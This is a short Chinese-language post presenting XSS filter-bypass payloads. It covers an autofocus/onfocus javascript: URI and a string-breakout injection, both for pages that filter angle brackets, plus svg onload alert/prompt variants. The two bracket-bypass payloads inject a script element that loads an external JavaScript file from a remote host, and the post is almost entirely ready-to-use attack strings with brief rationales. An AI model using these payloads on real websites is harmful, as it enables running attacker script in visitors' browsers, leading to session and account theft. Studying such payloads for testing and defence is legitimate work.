这是一篇另类的XSS绕过奇招

1.过滤了<>尖括号： 

原理：利用html以及js伪协议，当用户打开页面缓冲页面会自动获取焦点，从而触发js代码生成script标签，达到目的。

autofocus οnfοcus=location=”javasCript:s=document.createElement(“script”);s.src=”http:///xx.js”; document.body.appendChild(s);”
 

2.漏洞已经在JS代码中，但是过滤了<>尖括号：  

原理：利用js代码创建新script标签，引入外接js文件，达到目的。

‘;s=document.createElement(“script”);s.src=”http:///xx.js”;document.body.appendChild(s);”

3. <svg/οnlοad=alert(‘1’)/>  

若’单引号被禁，alert(”)可用prompt()代替

<svg/οnlοad=prompt(1)/>